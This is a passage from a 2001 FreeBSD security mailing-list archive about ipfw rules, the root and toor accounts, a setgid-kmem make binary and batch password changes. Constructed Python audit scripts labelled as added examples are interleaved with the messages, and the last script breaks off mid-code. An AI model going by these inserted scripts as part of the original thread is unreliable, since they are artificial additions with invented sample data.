xmit tun0 setup NIP> $fwcmd add allow tcp from any to any via tun0 established NIP> $fwcmd add allow tcp from any to any 80 setup NIP> $fwcmd add allow tcp from any to any 22 setup NIP> $fwcmd add reset log tcp from any to any 113 in recv tun0 NIP> $fwcmd add allow udp from any to MY_ISP'S_DNS_NUMBER 53 out xmit tun0 NIP> $fwcmd add allow udp from MY_ISP'S_DNS_NUMBER 53 to any in recv tun0 NIP> $fwcmd add 65435 allow icmp from any to any NIP> $fwcmd add 65435 deny log ip from any to any NIP> Maybe it's beacause of [options TCP_RESTRICT_RST] option added to my NIP> CUSTOM_KERNEL config file? Any ideas about this problem? NIP> Thanks in advance, NIP> == NIP> Nikolaj I. 
NIP> Potanin
NIP> http://www.physto.se/~nikolaj
NIP> UIN: 20582042

--
~/3APA3A
A new kind of elementary particle has appeared: the crackling. Not very big, slightly burnt. (Lem)

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu Jun 7 7:58:15 2001
Date: Thu, 7 Jun 2001 11:57:32 -0300
From: "Fernando P. Schapachnik"
To: "Nikolaj I. Potanin"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: ipfw and icq
Message-ID: <20010607115732.A13665@ns1.via-net-works.net.ar>
In-Reply-To: <1569370004.20010607180037@mail.spbnit.ru>; from nikolaj@mail.spbnit.ru on Thu, Jun 07, 2001 at 06:00:37PM +0400

In an earlier message, Nikolaj I. Potanin wrote:
> Hello to every GURU in this list!
>
> I'm a novice in this world :) and I have a problem configuring
> firewall (ipfw) and icq on my FreeBSD 4.2 box. I'm using a PPP connection
> to my ISP and therefore there are some differences in configuring ipfw
> (or not?). Everything works perfectly, the firewall filters all it has to, but
> I didn't manage to connect to my favorite icq.mirabilis.com:4000 %) I
> know that I should add something like

You are better off using some SOCKS server like dante (in the ports) and configuring your clients to use SOCKS 4.

Good luck!

Fernando P. Schapachnik
Network and technology planning
VIA NET.WORKS ARGENTINA S.A.
fschapachnik@vianetworks.com.ar
Tel.: (54-11) 4323-3381

From owner-freebsd-security Thu Jun 7 7:59:41 2001
Date: Thu, 7 Jun 2001 19:00:13 +0400
From: "Nikolaj I. Potanin"
To: "Laurynas Norvydas"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: ipfw and icq
Message-Id: <20010607190013.4a57045e.nikolaj@mail.spbnit.ru>
In-Reply-To: <0e4001c0ef5c$034299e0$241da8c0@ke.balt.net>

Ok, this worked for me also! Thank you so much, and all others that tried to help me!

/Nikolaj

LN> The connection has to go both ways: from you to the ICQ server, and back, from the ICQ server to you. So,
LN>
LN>   ${fwcmd} add pass udp from 205.188.153.96:255.255.255.248 4000 to any
LN>   ${fwcmd} add pass udp from any to 205.188.153.96:255.255.255.248 4000
LN>
LN> works for me :)

From owner-freebsd-security Thu Jun 7 8:06:10 2001
Date: Thu, 7 Jun 2001 16:06:01 +0100 (BST)
From: rich@rdrose.org
To: freebsd-security@FreeBSD.ORG
Subject: Re: root & toor
In-Reply-To: <20010607100241.N30276-100000@axis.tdd.lt>

On Thu, 7 Jun 2001, Domas Mituzas wrote:

> toor has bourne shell, root has C shell. the only difference, afaik.

Are *both* of these shells statically linked? Is toor's account disabled by default? Does toor own any files on the system, by default?

rik

From owner-freebsd-security Thu Jun 7 8:12:26 2001
From: "Antoine Beaupre (LMC)"
To: rich@rdrose.org
Cc: freebsd-security@FreeBSD.ORG
Message-ID: <3B1F99C0.E0E7FEE8@lmc.ericsson.se>
Date: Thu, 07 Jun 2001 11:12:00 -0400
Organization: LMC, Ericsson Research Canada
Subject: Re: root & toor

rich@rdrose.org wrote:
>
> On Thu, 7 Jun 2001, Domas Mituzas wrote:
> > toor has bourne shell, root has C shell. the only difference, afaik.
>
> Are *both* of these shells statically linked?

What does that mean?

> Is toor's account disabled by default?

On FreeBSD, by default:

  root::0:0::0:0:Charlie &:/root:/bin/csh
  toor:*:0:0::0:0:Bourne-again Superuser:/root:

i.e. root's account is null-passwd'd and the toor account is de-activated.

> Does toor own any files on the system, by default?

Files are "owned" by uid. Since the root and toor accounts share the same uid, toor owns basically the same files as root, even if ls and friends will show the files as owned by root, probably because it's the first in the db (?).

Basically, from what I understand, the root and toor accounts are the same, apart from the shell.

A.

--
Semantics is the gravity of abstraction.

From owner-freebsd-security Thu Jun 7 8:19:02 2001
Message-ID: <009501c0ef65$23482580$0600a8c0@ibmka.internethelp.ru>
From: "Nickolay A. Kritsky"
Subject: SGID make
Date: Thu, 7 Jun 2001 19:18:42 +0400

Can anybody tell me why /usr/local/bin/make in FreeBSD 4.2 is SGID kmem? I thought that make is intended only for compiling huge C programs, isn't it?

  # ls -l /usr/local/bin/make
  -rwxr-sr-x 1 root kmem 445486 May 14 15:58 /usr/local/bin/make

Thanks for any help.

NKritsky - SysAdmin InternetHelp.Ru
http://www.internethelp.ru
e-mail: nkritsky@internethelp.ru

From owner-freebsd-security Thu Jun 7 8:23:09 2001
Date: Thu, 7 Jun 2001 18:21:52 +0300
From: Peter Pentchev
To: rich@rdrose.org
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: root & toor
Message-ID: <20010607182152.B724@ringworld.oblivion.bg>

On Thu, Jun 07, 2001 at 04:06:01PM +0100, rich@rdrose.org wrote:
> On Thu, 7 Jun 2001, Domas Mituzas wrote:
> > toor has bourne shell, root has C shell. the only difference, afaik.
>
> Are *both* of these shells statically linked? Is toor's account disabled
> by default? Does toor own any files on the system, by default?

All login shells in the FreeBSD base system are statically linked - they are all placed in /bin, and everything in /bin and /sbin *must* be statically linked for obvious reasons (think NFS-mounted /usr).

As others pointed out, yes, the toor account is disabled by default, and yes, toor owns all the root-owned files on the system :)

G'luck,
Peter

--
If this sentence didn't exist, somebody would have invented it.
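The checks this thread walks through (a second uid-0 account, toor's '*' password, root's empty password, and where the superuser shells live) as an added audit script; it is not from the thread or from FreeBSD. The sample text is constructed from the two default entries Antoine quoted plus one invented extra account, and the names Entry, parse_master_passwd and audit_superusers are this example's own.

```python
"""Audit uid-0 entries in a FreeBSD master.passwd dump (added example)."""
from __future__ import annotations

from dataclasses import dataclass

# master.passwd(5) field order: name, password hash, uid, gid, login class,
# password change time, account expiry, gecos, home directory, shell.
FIELDS = ("name", "passwd", "uid", "gid", "class", "change", "expire",
          "gecos", "home", "shell")

# Constructed sample: the two default entries quoted in the thread, plus a
# made-up third uid-0 account whose shell lives outside the base system.
SAMPLE_MASTER_PASSWD = """\
root::0:0::0:0:Charlie &:/root:/bin/csh
toor:*:0:0::0:0:Bourne-again Superuser:/root:
kevin:$1$saltsalt$hashhashhashhashhashhas:0:0::0:0:Extra admin:/home/kevin:/usr/local/bin/bash
"""


@dataclass
class Entry:
    name: str
    passwd: str
    uid: int
    gid: int
    shell: str

    @property
    def locked(self) -> bool:
        # A hash field starting with '*' can never match a typed password,
        # so password authentication for the account is disabled.
        return self.passwd.startswith("*")

    @property
    def empty_password(self) -> bool:
        return self.passwd == ""


def parse_master_passwd(text: str) -> list[Entry]:
    entries: list[Entry] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != len(FIELDS):
            raise ValueError(f"line {lineno}: expected {len(FIELDS)} fields, got {len(parts)}")
        rec = dict(zip(FIELDS, parts))
        # An empty shell field means /bin/sh, per passwd(5); this is why the
        # quoted toor entry ends in ':' yet toor gets a Bourne shell.
        shell = rec["shell"] or "/bin/sh"
        entries.append(Entry(rec["name"], rec["passwd"], int(rec["uid"]), int(rec["gid"]), shell))
    return entries


def audit_superusers(entries: list[Entry]) -> dict[str, list[str]]:
    """Return findings per uid-0 account; every uid-0 name is a key, even with no findings."""
    findings: dict[str, list[str]] = {}
    for e in entries:
        if e.uid != 0:
            continue
        notes = []
        if e.empty_password:
            notes.append("empty password: password login as uid 0 needs no secret at all")
        if e.locked:
            notes.append("password login disabled ('*' in the password field)")
        if not e.shell.startswith(("/bin/", "/sbin/")):
            # Shells in /bin and /sbin are statically linked base-system binaries;
            # anything else depends on /usr and shared libraries being available.
            notes.append(f"shell {e.shell} is outside /bin and /sbin")
        findings[e.name] = notes
    return findings


if __name__ == "__main__":
    for name, notes in audit_superusers(parse_master_passwd(SAMPLE_MASTER_PASSWD)).items():
        print(f"{name}: " + ("; ".join(notes) or "no findings"))
```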
From owner-freebsd-security Thu Jun 7 8:25:07 2001
Date: Thu, 7 Jun 2001 12:24:37 -0300
From: "Fernando P. Schapachnik"
To: "Nickolay A. Kritsky"
Cc: security@FreeBSD.ORG
Subject: Re: SGID make
Message-ID: <20010607122437.A30591@ns1.via-net-works.net.ar>
In-Reply-To: <009501c0ef65$23482580$0600a8c0@ibmka.internethelp.ru>; from nkritsky@internethelp.ru on Thu, Jun 07, 2001 at 07:18:42PM +0400

In an earlier message, Nickolay A. Kritsky wrote:
> Can anybody tell me why /usr/local/bin/make in FreeBSD 4.2 is SGID kmem? I thought that make is intended only for compiling
> huge C programs, isn't it?
>
> # ls -l /usr/local/bin/make
> -rwxr-sr-x 1 root kmem 445486 May 14 15:58 /usr/local/bin/make

If it lives in /usr/*local*/bin then it is a local addition; the standard make is in /usr/bin/make.

Regards!

Fernando P. Schapachnik
Network and technology planning
VIA NET.WORKS ARGENTINA S.A.
fschapachnik@vianetworks.com.ar
Tel.: (54-11) 4323-3381

From owner-freebsd-security Thu Jun 7 8:27:39 2001
Date: Thu, 7 Jun 2001 18:26:22 +0300
From: Peter Pentchev
To: "Nickolay A. Kritsky"
Cc: security@freebsd.org
Subject: Re: SGID make
Message-ID: <20010607182622.C724@ringworld.oblivion.bg>
In-Reply-To: <009501c0ef65$23482580$0600a8c0@ibmka.internethelp.ru>; from nkritsky@internethelp.ru on Thu, Jun 07, 2001 at 07:18:42PM +0400

On Thu, Jun 07, 2001 at 07:18:42PM +0400, Nickolay A. Kritsky wrote:
> Can anybody tell me why /usr/local/bin/make in FreeBSD 4.2 is SGID kmem? I thought that make is intended only for compiling
> huge C programs, isn't it?
>
> # ls -l /usr/local/bin/make
> -rwxr-sr-x 1 root kmem 445486 May 14 15:58 /usr/local/bin/make
>
> Thanks for any help.

Are you sure nothing has been changed on your system? There's nothing in revision 1.13 of src/usr.bin/make/Makefile that should cause make(1) to be installed setgid kmem.

G'luck,
Peter

--
Do you think anybody has ever had *precisely this thought* before?

From owner-freebsd-security Thu Jun 7 8:28:38 2001
Date: Thu, 7 Jun 2001 18:27:19 +0300
From: Peter Pentchev
To: "Nickolay A. Kritsky", security@freebsd.org
Subject: Re: SGID make
Message-ID: <20010607182719.D724@ringworld.oblivion.bg>
In-Reply-To: <20010607182622.C724@ringworld.oblivion.bg>; from roam@orbitel.bg on Thu, Jun 07, 2001 at 06:26:22PM +0300

On Thu, Jun 07, 2001 at 06:26:22PM +0300, Peter Pentchev wrote:
> On Thu, Jun 07, 2001 at 07:18:42PM +0400, Nickolay A. Kritsky wrote:
> > Can anybody tell me why /usr/local/bin/make in FreeBSD 4.2 is SGID kmem? I thought that make is intended only for compiling
> > huge C programs, isn't it?
> >
> > # ls -l /usr/local/bin/make
> > -rwxr-sr-x 1 root kmem 445486 May 14 15:58 /usr/local/bin/make
> >
> > Thanks for any help.
>
> Are you sure nothing has been changed on your system?
> There's nothing in revision 1.13 of src/usr.bin/make/Makefile that
> should cause make(1) to be installed setgid kmem.

Er, whoops. Of course I should've noticed that this lives in /usr/local. Well, this is not FreeBSD 4.2's make(1).

G'luck,
Peter

--
This would easier understand fewer had omitted.
From owner-freebsd-security Thu Jun 7 8:47:27 2001
Date: Thu, 7 Jun 2001 11:47:15 -0400
From: Alfred Perlstein
To: "Nickolay A. Kritsky"
Cc: security@FreeBSD.ORG
Subject: Re: SGID make
Message-ID: <20010607114714.R1832@superconductor.rush.net>
In-Reply-To: <009501c0ef65$23482580$0600a8c0@ibmka.internethelp.ru>; from nkritsky@internethelp.ru on Thu, Jun 07, 2001 at 07:18:42PM +0400

* Nickolay A. Kritsky [010607 11:19] wrote:
> Can anybody tell me why /usr/local/bin/make in FreeBSD 4.2 is SGID kmem? I thought that make is intended only for compiling
> huge C programs, isn't it?
>
> # ls -l /usr/local/bin/make
> -rwxr-sr-x 1 root kmem 445486 May 14 15:58 /usr/local/bin/make

As people have stated, this isn't our make; it's most likely GNU make installed without using the port.

The reason for the sgid'ness is most likely so that the binary can query the system load average to optimize parallel compilation without overwhelming the system.

Although, this is sort of silly, as the info should be available via sysctl in FreeBSD.

--
-Alfred Perlstein [alfred@freebsd.org]
Instead of asking why a piece of software is using "1970s technology,"
start asking why software is ignoring 30 years of accumulated wisdom.
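Two sides of Alfred's point as an added example (not from the thread, FreeBSD or GNU make): spotting a set-id binary from an ls -l line like the one Nickolay posted, and the load-average gating that GNU make's -l option performs, fed by os.getloadavg(), which wraps getloadavg(3) and needs no kmem group membership. The first listing line is the one from the thread; the other two are constructed, and the function names are this example's own.

```python
"""Set-id audit from ls -l output, and load-limited job scheduling without kmem (added example)."""
from __future__ import annotations

import os
import re
from dataclasses import dataclass

# Groups whose membership hands a program far more than reading a load average
# needs; kmem in particular grants read access to /dev/mem and /dev/kmem on FreeBSD.
SENSITIVE_GROUPS = {"kmem", "wheel", "operator"}

# Shape of an `ls -l` line: mode, link count, owner, group, size, month, day, time-or-year, path.
LS_LINE = re.compile(
    r"^(?P<mode>[-dlbcps][rwxsStT-]{9})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)"
    r"\s+\d+\s+\S+\s+\d+\s+\S+\s+(?P<path>\S+)$"
)

# Constructed listing: the first line is the one posted in the thread; the other
# two are made up to exercise a clean binary and a setuid-root one.
SAMPLE_LS = """\
-rwxr-sr-x 1 root kmem 445486 May 14 15:58 /usr/local/bin/make
-r-xr-xr-x 1 root wheel 106700 Jan 10 09:12 /usr/bin/make
-r-sr-xr-x 1 root wheel 12288 Jan 10 09:12 /usr/bin/su
"""


@dataclass
class SetIdFinding:
    path: str
    owner: str
    group: str
    setuid: bool
    setgid: bool

    @property
    def risky(self) -> bool:
        # setuid root, or setgid to a group that unlocks kernel memory or admin rights.
        return (self.setuid and self.owner == "root") or (self.setgid and self.group in SENSITIVE_GROUPS)

    def describe(self) -> str:
        bits = []
        if self.setuid:
            bits.append(f"setuid {self.owner}")
        if self.setgid:
            bits.append(f"setgid {self.group}")
        return f"{self.path}: {', '.join(bits)}" + (" (sensitive)" if self.risky else "")


def parse_ls_line(line: str) -> SetIdFinding:
    m = LS_LINE.match(line.strip())
    if not m:
        raise ValueError(f"not an ls -l line: {line!r}")
    mode = m["mode"]
    # mode[3] is the owner execute slot and mode[6] the group execute slot;
    # 's' (or 'S' without execute) there means the corresponding set-id bit is on.
    return SetIdFinding(m["path"], m["owner"], m["group"], mode[3] in "sS", mode[6] in "sS")


def setid_findings(listing: str) -> list[SetIdFinding]:
    """Return only the entries that carry a setuid or setgid bit."""
    return [f for f in map(parse_ls_line, listing.splitlines()) if f.setuid or f.setgid]


def may_start_job(running: int, max_jobs: int, load1: float, max_load: float) -> bool:
    """GNU make style gating: -j caps concurrency; -l refuses new jobs while other
    jobs are running and the 1-minute load is at or above the limit. With nothing
    running, one job always starts, so a loaded machine cannot stall the build."""
    if running >= max_jobs:
        return False
    if running > 0 and load1 >= max_load:
        return False
    return True


def current_load1() -> float:
    # Unprivileged: getloadavg(3) reads the vm.loadavg sysctl on FreeBSD and
    # /proc/loadavg on Linux, so no kmem group or kvm(3) access is needed.
    return os.getloadavg()[0]


if __name__ == "__main__":
    for finding in setid_findings(SAMPLE_LS):
        print(finding.describe())
    print("may start job:", may_start_job(running=2, max_jobs=4, load1=current_load1(), max_load=2.0))
```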
From owner-freebsd-security Thu Jun 7 9:05:10 2001
Message-ID: <02ab01c0ef6b$b1002610$0900a8c0@windows>
From: "Marcel Dijk"
Subject: IPFW rules > ports still open!
Date: Thu, 7 Jun 2001 18:05:37 +0200

Hello,

I have tried to make a good firewall but I have some problems. This is my rc.firewall.rules file:

  add 500 allow all from 192.168.0.0/16 to any
  add 525 allow all from any to 192.168.0.0/16

  #add 575 allow ip from any to MY_IP
  #add 600 allow ip from MY_IP to any

  add 615 allow tcp from any to MY_IP 22,5618,10000
  add 625 allow tcp from MY_IP to any

  add 650 allow udp from any to MY_IP
  add 700 allow udp from MY_IP to any

  add 800 allow icmp from any to MY_IP
  add 750 allow icmp from MY_IP to any

(MY_IP is my internet IP address. I have blocked it out for obvious reasons.)

The problem is that I can't access the services that I have allowed. For example, I can't access the service that's behind port 22 on MY_IP. Why is this? If I allow ip from any to MY_IP and allow ip from MY_IP to any, all ports are open. And that's just what I don't want.

I hope you guys fill me and can help me.

Thanks, I can't seem to solve this one.
Marcel

From owner-freebsd-security Thu Jun 7 9:20:14 2001
Date: Thu, 7 Jun 2001 12:20:01 -0400
From: "Christian S."
To: Marcel Dijk
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: IPFW rules > ports still open!
Message-ID: <20010607122001.B72448@netrail.net>
In-Reply-To: <02ab01c0ef6b$b1002610$0900a8c0@windows>; from nascar24@home.nl on Thu, Jun 07, 2001 at 06:05:37PM +0200

On pain of being relatively obvious, do you have those particular daemons running (such as sshd, etc.)? What's the output of tcpdump when you do it? What errors are you receiving? What's the output of sockstat? Have you done an ipfw -t show to see what rules are getting hit/dropped/acked?

This should help start the troubleshooting process; sorry I can't be more precise.. :/

Christian

On Thu, Jun 07, 2001 at 06:05:37PM +0200, Marcel Dijk babbled:
---end quoted text---

--
Christian Schreiber, Netrail Network Security Engineer - Ape will not kill Ape

From owner-freebsd-security Thu Jun 7 9:20:46 2001
Date: Thu, 7 Jun 2001 12:22:03 -0400 (EDT)
From: David Miner
To: edwin chan
Cc: Olivier Nicole
Subject: Re: Encrypted passwords
In-Reply-To: <009e01c0ef55$da422340$9201a8c0@home.net>

On Thu, 7 Jun 2001, edwin chan wrote:

> I think that:
> you have a user list, and you can make a random password for them, then you
> can use "expect" and "passwd user" to do your jobs and don't worry how chpass
> works.
>

Using "passwd" for 50 users at a time is something I would like to automate. "adduser" also works, one user at a time. That is what I was trying to get away from.

David

---------------------------------------------------------------------
David R. Miner                    miner@lis.fsu.edu
Systems Integrator                voice: 850-644-8107
School of Information Studies     fax: 850-644-6253
Florida State University          Tallahassee, FL 32306-2100

From owner-freebsd-security Thu Jun 7 9:23:10 2001
Date: Thu, 7 Jun 2001 12:24:31 -0400 (EDT)
From: David Miner
To: Olivier Nicole
Subject: Re: Encrypted passwords
In-Reply-To: <200106070159.IAA25340@banyan.cs.ait.ac.th>

Olivier,

I will try these things. I am not running NIS. The script is not setuid. I run it as root under my C shell, which may be part of the problem, as you point out. I keep the script in the root directory with 700 permissions. I'll get back to you with the results of the "print" testing. Thanks.

David

On Thu, 7 Jun 2001, Olivier Nicole wrote:

> David,
>
> > I changed it to a system call from perl and went on.
>
> As a first step I would try to make sure the system call is what I
> really want: replace 'system' with 'print' and carefully check for any
> strange character. I'd be especially suspicious about the contents of
> that variable that holds the password.
>
> Second, I would consider that the system call is made under the Bourne
> shell; it may have a different environment than the shell you use for
> everyday work, and it may simply be missing some environment
> variable.
>
> I understood you run the script as root; it is not a setuid script?
> Else you'd need to untaint the variables.
>
> As a last resort, I'd copy the script, remove all the fancy interface
> and keep only the system call. Try to split it, add some print, some pw
> usershow, etc.
>
> Is your system running NIS? It could be a problem that the new user
> has not yet propagated through NIS and then the password cannot be
> set...
>
> Olivier

---------------------------------------------------------------------
David R.
Miner                             miner@lis.fsu.edu
Systems Integrator                voice: 850-644-8107
School of Information Studies     fax: 850-644-6253
Florida State University          Tallahassee, FL 32306-2100

From owner-freebsd-security Thu Jun 7 9:23:35 2001
Message-ID: <00da01c0ef6e$28bc6450$0600a8c0@ibmka.internethelp.ru>
From: "Nickolay A. Kritsky"
To: "Alfred Perlstein"
Subject: Re: SGID make
Date: Thu, 7 Jun 2001 20:23:16 +0400

I thank you all for your suggestions and think that it _is_ GNU make. It seems to be installed from the "package collections" located on the 4.2 CD; I will check it later.

Best regards

NKritsky - SysAdmin InternetHelp.Ru
http://www.internethelp.ru
e-mail: nkritsky@internethelp.ru

-----Original Message-----
From: Alfred Perlstein
To: Nickolay A. Kritsky
Cc: security@FreeBSD.ORG
Date: 7 June 2001 19:47
Subject: Re: SGID make

From owner-freebsd-security Thu Jun 7 9:39:09 2001
Date: Thu, 7 Jun 2001 09:39:05 -0700
From: Kris Kennaway
To: "Nickolay A. Kritsky"
Cc: Alfred Perlstein, security@FreeBSD.ORG
Subject: Re: SGID make
Message-ID: <20010607093905.C51488@xor.obsecurity.org>
In-Reply-To: <00da01c0ef6e$28bc6450$0600a8c0@ibmka.internethelp.ru>

On Thu, Jun 07, 2001 at 08:23:16PM +0400, Nickolay A. Kritsky wrote:
> I thank you all for your suggestions and think that it _is_ GNU make. It
> seems to be installed from the "package collections" located on the 4.2 CD;
> I will check it later.

I'm pretty sure we removed this quite some time ago; if not then please let
us know.

Kris

From owner-freebsd-security Thu Jun 7 9:39:47 2001
Message-ID: <00f501c0ef70$6fdbb820$0600a8c0@ibmka.internethelp.ru>
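The SGID make thread above starts from a single "ls -l" line showing a binary that is setgid kmem. The script below is an added example, not code from the thread or from FreeBSD: it is the periodic audit a defender would run to list every setuid/setgid file under a tree with its owner and group, so an unexpected privileged binary (or an unexpected group such as kmem) stands out. The starting path, the SENSITIVE_GROUPS set and the "!!" marker are assumptions chosen for the example.

```python
"""Audit a directory tree for setuid/setgid executables (added example)."""
import grp
import os
import pwd
import stat
from dataclasses import dataclass
from typing import Callable, Iterator, List

# Groups whose setgid binaries deserve a second look. Assumption for the
# example; kmem is the one the thread is about.
SENSITIVE_GROUPS = {"kmem", "wheel", "operator"}


@dataclass(frozen=True)
class PrivilegedFile:
    path: str
    mode: int      # permission bits only (stat.S_IMODE)
    owner: str
    group: str

    @property
    def setuid(self) -> bool:
        return bool(self.mode & stat.S_ISUID)

    @property
    def setgid(self) -> bool:
        return bool(self.mode & stat.S_ISGID)

    @property
    def suspicious(self) -> bool:
        # setgid into a sensitive group, or setuid root
        return (self.setgid and self.group in SENSITIVE_GROUPS) or (
            self.setuid and self.owner == "root")


def _name(lookup: Callable[[int], str], ident: int) -> str:
    """Resolve a uid/gid to a name, falling back to the number."""
    try:
        return lookup(ident)
    except KeyError:
        return str(ident)


def find_privileged(root: str) -> Iterator[PrivilegedFile]:
    """Yield regular files under root that carry the setuid or setgid bit.

    lstat is used so symlinks are never followed: a link pointing at a
    setuid file is not itself privileged, and symlinked directories are
    not descended into.
    """
    for dirpath, _dirnames, filenames in os.walk(root, followlinks=False):
        for fn in filenames:
            p = os.path.join(dirpath, fn)
            try:
                st = os.lstat(p)
            except OSError:
                continue  # unreadable or vanished while walking
            if not stat.S_ISREG(st.st_mode):
                continue
            if st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                yield PrivilegedFile(
                    path=p,
                    mode=stat.S_IMODE(st.st_mode),
                    owner=_name(lambda u: pwd.getpwuid(u).pw_name, st.st_uid),
                    group=_name(lambda g: grp.getgrgid(g).gr_name, st.st_gid),
                )


def report(root: str) -> List[str]:
    """One ls-style line per privileged file; suspicious ones marked '!!'."""
    lines = []
    for f in sorted(find_privileged(root), key=lambda f: f.path):
        flag = "!!" if f.suspicious else "  "
        perms = stat.filemode(stat.S_IFREG | f.mode)
        lines.append(f"{flag} {perms} {f.owner}:{f.group} {f.path}")
    return lines


if __name__ == "__main__":
    import sys
    # Default path is an assumption; pass any tree as the first argument.
    for line in report(sys.argv[1] if len(sys.argv) > 1 else "/usr/local/bin"):
        print(line)
```

Run it against /usr/local/bin (or the whole system with a long-running walk) and compare the output with the previous run; a new line is the thing to explain, the way the thread explains GNU make's load-average query.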
From: "Nickolay A. Kritsky"
To: "Marcel Dijk"
Subject: Re: IPFW rules > ports still open!
Date: Thu, 7 Jun 2001 20:39:35 +0400

Do you mean that when you uncomment rules 575 and 600 everything works just
fine, or that it does not help much?

Good Luck
NKritsky - SysAdmin InternetHelp.Ru
http://www.internethelp.ru
e-mail: nkritsky@internethelp.ru

-----Original Message-----
From: Marcel Dijk
To: freebsd-security@FreeBSD.ORG
Date: 7 June 2001 20:05
Subject: IPFW rules > ports still open!

>Hello,
>
>i have tried to make a good firewall but I have some problems. This is my
>rc.firewall.rules file.
>
>add 500 allow all from 192.168.0.0/16 to any
>add 525 allow all from any to 192.168.0.0/16
>
>#add 575 allow ip from any to MY_IP
>#add 600 allow ip from MY_IP to any
>
>add 615 allow tcp from any to MY_IP 22,5618,10000
>add 625 allow tcp from MY_IP to any
>
>add 650 allow udp from any to MY_IP
>add 700 allow udp from MY_IP to any
>
>add 800 allow icmp from any to MY_IP
>add 750 allow icmp from MY_IP to any
>
>(MY_IP is my internet IP address. I have blocked it for obvious reasons)
>
>The problem is that I can't access the services that I have allowed. For
>example I can't access the service that's behind port 22 on MY_IP.
>Why is this? If I allow IP from any to MY_IP and allow ip from MY_IP to any
>all ports are open. And that's just what I don't want.
>
>I hope you guys follow me and can help me.
>
>Thanks, I can't seem to solve this one.
>
>Marcel

From owner-freebsd-security Thu Jun 7 10:08:02 2001
Message-ID: <02de01c0ef74$79397f70$0900a8c0@windows>
From: "Marcel Dijk"
To: freebsd-security@FreeBSD.ORG
Subject: Re: IPFW rules > ports still open!
Date: Thu, 7 Jun 2001 19:08:29 +0200

> If your address lies in 192.168.0.0/16 then the first two rules allow
> access to it. In IPFW, rules are checked one by one until the first
> matching rule is found. You should add exclusive rules for your IP before
> you open the whole network.

No, I mean that with these rules I can't connect to, for example, my sshd.
But I have opened the port with rules #615 & 625. And if I uncomment rules
575 & 600 all my ports are open.

Marcel

> Otherwise check the
>
> IPFIREWALL_DEFAULT_TO_ACCEPT
>
> kernel option.
>
> --07.06.2001 20:05, you wrote "IPFW rules > ports still open!" to
> freebsd-security@FreeBSD.ORG;
>
> M> Hello,
>
> M> i have tried to make a good firewall but I have some problems. This is my
> M> rc.firewall.rules file.
>
> M> add 500 allow all from 192.168.0.0/16 to any
> M> add 525 allow all from any to 192.168.0.0/16
>
> M> #add 575 allow ip from any to MY_IP
> M> #add 600 allow ip from MY_IP to any
>
> M> add 615 allow tcp from any to MY_IP 22,5618,10000
> M> add 625 allow tcp from MY_IP to any
>
> M> add 650 allow udp from any to MY_IP
> M> add 700 allow udp from MY_IP to any
>
> M> add 800 allow icmp from any to MY_IP
> M> add 750 allow icmp from MY_IP to any
>
> M> (MY_IP is my internet IP address. I have blocked it for obvious reasons)
>
> M> The problem is that I can't access the services that I have allowed. For
> M> example I can't access the service that's behind port 22 on MY_IP.
> M> Why is this? If I allow IP from any to MY_IP and allow ip from MY_IP to any
> M> all ports are open. And that's just what I don't want.
>
> M> Marcel
>
> --
> Vladimir Dubrovin                 Service Center Coordinator
> http://www.sandy.ru               SANDY, ISP
> http://www.security.nnov.ru       Nizhny Novgorod, Russia

From owner-freebsd-security Thu Jun 7 11:06:02 2001
Date: Thu, 7 Jun 2001 20:06:15 +0200
From: "Karsten W. Rohrbach"
To: freebsd-security@FreeBSD.ORG
Subject: Re: IPFW rules > ports still open!
Message-ID: <20010607200615.P59617@mail.webmonster.de>
In-Reply-To: <02de01c0ef74$79397f70$0900a8c0@windows>

Marcel Dijk(nascar24@home.nl)@2001.06.07 19:08:29 +0000:
> > M> add 615 allow tcp from any to MY_IP 22,5618,10000
> > M> add 625 allow tcp from MY_IP to any

try:

add 615 allow tcp from any to MY_IP 22
add 615 allow tcp from any to MY_IP 5618
add 615 allow tcp from any to MY_IP 10000
add 625 allow tcp from MY_IP to any

perhaps there exist some side effects in the rule parser?

/k
--
> God isn't dead -- he's been busted.
KR433/KR11-RIPE -- WebMonster Community Founder -- nGENn GmbH Senior Techie
http://www.webmonster.de/ -- ftp://ftp.webmonster.de/ -- http://www.ngenn.net/
karsten&rohrbach.de -- alpha&ngenn.net -- alpha&scene.org -- catch@spam.de
GnuPG 0x2964BF46 2001-03-15 42F9 9FFF 50D4 2F38 DBEE DF22 3340 4F4E 2964 BF46

From owner-freebsd-security Thu Jun 7 11:12:48 2001
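Three things in the IPFW thread above can be checked on paper: Vladimir's point that ipfw walks the chain in rule-number order and stops at the first match, Marcel's observation that enabling rules 575/600 opens every port, and Karsten's suggestion to split the multi-port rule 615 into one rule per port. The simulator below is an added example, not code from the thread or from FreeBSD; it models only the rule syntax the posted rc.firewall.rules uses, stands in 203.0.113.10 (a documentation address) for the redacted MY_IP, and assumes the default policy is deny, i.e. a kernel without IPFIREWALL_DEFAULT_TO_ACCEPT. It says which rule a given packet hits; it cannot say anything about the real parser question Karsten raises.

```python
"""First-match simulation of the posted ipfw ruleset (added example)."""
import ipaddress
import re
from dataclasses import dataclass
from typing import List, Optional, Set, Tuple

MY_IP = "203.0.113.10"   # stand-in for the poster's redacted address

# The rc.firewall.rules lines quoted in the thread, verbatim.
RULESET = """
add 500 allow all from 192.168.0.0/16 to any
add 525 allow all from any to 192.168.0.0/16

#add 575 allow ip from any to MY_IP
#add 600 allow ip from MY_IP to any

add 615 allow tcp from any to MY_IP 22,5618,10000
add 625 allow tcp from MY_IP to any

add 650 allow udp from any to MY_IP
add 700 allow udp from MY_IP to any

add 800 allow icmp from any to MY_IP
add 750 allow icmp from MY_IP to any
"""

# Only the subset of ipfw(8) syntax the thread uses.
_RULE = re.compile(
    r"^add\s+(?P<num>\d+)\s+(?P<action>allow|deny)\s+"
    r"(?P<proto>all|ip|tcp|udp|icmp)\s+from\s+(?P<src>\S+)\s+to\s+(?P<dst>\S+)"
    r"(?:\s+(?P<ports>[\d,\-]+))?\s*$"
)


@dataclass
class Rule:
    num: int
    seq: int                     # insertion order, tie-breaker for equal numbers
    action: str
    proto: str
    src: ipaddress.IPv4Network
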